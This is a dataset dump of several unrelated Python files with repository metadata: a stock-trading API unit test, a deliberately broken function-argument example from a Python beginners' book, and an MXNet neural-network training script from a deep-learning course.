'position_effect':Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_CLOSE'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': stkparm['涨停价'],
'quantity': 2
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
if rs['用例测试结果']:
logger.warning('执行结果为{0}'.format(str(rs['用例测试结果'])))
else:
logger.warning('执行结果为{0},{1},{2}'.format(
str(rs['用例测试结果']), str(rs['用例错误源']),
json.dumps(rs['用例错误原因'], encoding='UTF-8', ensure_ascii=False)))
self.assertEqual(rs['用例测试结果'], True) # 4
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
a8d1a0375bce03ca9605bc955a1bef231c78a0bd | 0e638cd11c1ac64dcd1672936a1b0d7d545ee29f | /src/required_arg_after_optional_arg.py | f25f359628beedb42bfa80b56273c8056eba4778 | [] | no_license | simon-ritchie/python-novice-book | 2557d397a8f6025b63f3173c24bd4dcdb48aef8c | 1492adf603ba4dd1e9fadb48b74e49887c917dc6 | refs/heads/master | 2020-12-26T16:47:36.945581 | 2020-08-04T12:16:10 | 2020-08-04T12:16:10 | 237,569,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py | def multiply_x_by_y(x=10, y):
multiplied_value = x * y
print(multiplied_value) | [
"[email protected]"
] | |
2d5241ff37c81e87fe5dde76480448e82b1a8bf5 | 2bacd64bd2679bbcc19379947a7285e7ecba35c6 | /1-notebook-examples/keras-udemy-course/ann_class2/mxnet_example.py | 9ea745fce7cb6e4c583659c52a0dfbfe86e6fcb1 | [
"MIT"
] | permissive | vicb1/deep-learning | cc6b6d50ae5083c89f22512663d06b777ff8d881 | 23d6ef672ef0b3d13cea6a99984bbc299d620a73 | refs/heads/master | 2022-12-12T15:56:55.565836 | 2020-03-06T01:55:55 | 2020-03-06T01:55:55 | 230,293,726 | 0 | 0 | MIT | 2022-12-08T05:27:43 | 2019-12-26T16:23:18 | Jupyter Notebook | UTF-8 | Python | false | false | 2,621 | py | # https://deeplearningcourses.com/c/data-science-deep-learning-in-theano-tensorflow
# https://www.udemy.com/data-science-deep-learning-in-theano-tensorflow
from __future__ import print_function, division
from builtins import range
# Note: you may need to update your version of future
# sudo pip install -U future
# installation is just one line:
# https://mxnet.incubator.apache.org/get_started/install.html
#
# Mac:
# pip install mxnet
#
# Linux (GPU):
# pip install mxnet-cu80
#
# Windows (a little more involved):
# https://mxnet.incubator.apache.org/get_started/windows_setup.html
import mxnet as mx
import numpy as np
import matplotlib.pyplot as plt
from util import get_normalized_data, y2indicator
# get the data, same as Theano + Tensorflow examples
# no need to split now, the fit() function will do it
Xtrain, Xtest, Ytrain, Ytest = get_normalized_data()
# get shapes
N, D = Xtrain.shape
K = len(set(Ytrain))
# training config
batch_size = 32
epochs = 15
# convert the data into a format appropriate for input into mxnet
train_iterator = mx.io.NDArrayIter(
Xtrain,
Ytrain,
batch_size,
shuffle=True
)
test_iterator = mx.io.NDArrayIter(Xtest, Ytest, batch_size)
# define a placeholder to represent the inputs
data = mx.sym.var('data')
# define the model architecture
a1 = mx.sym.FullyConnected(data=data, num_hidden=500)
z1 = mx.sym.Activation(data=a1, act_type="relu")
a2 = mx.sym.FullyConnected(data=z1, num_hidden = 300)
z2 = mx.sym.Activation(data=a2, act_type="relu")
a3 = mx.sym.FullyConnected(data=z2, num_hidden=K)
y = mx.sym.SoftmaxOutput(data=a3, name='softmax')
# train it
# required in order for progress to be printed
import logging
logging.getLogger().setLevel(logging.DEBUG)
# use mx.gpu() if you have gpu
model = mx.mod.Module(symbol=y, context=mx.cpu())
model.fit(
train_iterator, # train data
eval_data=test_iterator, # validation data
optimizer=mx.optimizer.Adam(),
eval_metric='acc', # report accuracy during training
batch_end_callback = mx.callback.Speedometer(batch_size, 100), # output progress for each 100 data batches
num_epoch=epochs,
)
# no return value
# list of optimizers: https://mxnet.incubator.apache.org/api/python/optimization.html
# test it
# predict accuracy of mlp
acc = mx.metric.Accuracy()
model.score(test_iterator, acc)
print(acc)
print(acc.get())
# currently, there is no good way to plot the training loss / accuracy history
# https://github.com/apache/incubator-mxnet/issues/2873
#
# some have suggested parsing the logs
# https://github.com/apache/incubator-mxnet/blob/master/example/kaggle-ndsb1/training_curves.py
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.